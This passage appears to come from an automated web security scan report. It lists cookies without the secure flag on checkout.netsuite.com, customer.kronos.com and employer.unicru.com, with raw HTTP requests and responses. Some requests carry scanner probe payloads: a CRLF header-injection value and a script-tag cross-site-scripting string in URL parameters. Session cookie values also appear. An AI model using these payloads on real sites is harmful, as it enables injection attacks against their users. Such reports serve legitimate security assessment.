User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:12 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368749109:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:31 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -812652053:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.7. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110558500:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.8. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:04:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110576631:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.9. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112884952:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.10. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:38 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144353504:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.11. https://checkout.netsuite.com/core/styles/pagestyles.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:02 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:02 GMT
NS_RTIMER_COMPOSITE: -1134201633:616363742D6A6176613036312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 67958

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

11.12. https://checkout.netsuite.com/pages/portal/css/main.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/pages/portal/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/css/main.css?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007E)%3C/script%3E HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:12:54 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 225122148:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css
Content-Length: 2044

td, p        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #333333;
   font-size: 11px;
}

.blueSubhead        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #004584;
   font-weight:
...[SNIP]...

11.13. https://checkout.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:59 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -690374290:616363742D6A6176613038362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320

<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

11.14. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/s.nl

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700514546:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
Set-Cookie: NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=869
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2244

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

11.15. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://customer.kronos.com
Path:	/Default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
KronosCust=LogIn=false; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /Default.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private

11.16. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
KTMDWestLB=993264394.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/

<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

11.17. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
KTMDWestLB=184615946.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: employer.unicru.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 43
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=184615946.20736.0000; path=/

<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

11.18. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
KTMDWestLB=1211368202.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=1211368202.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

11.19. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

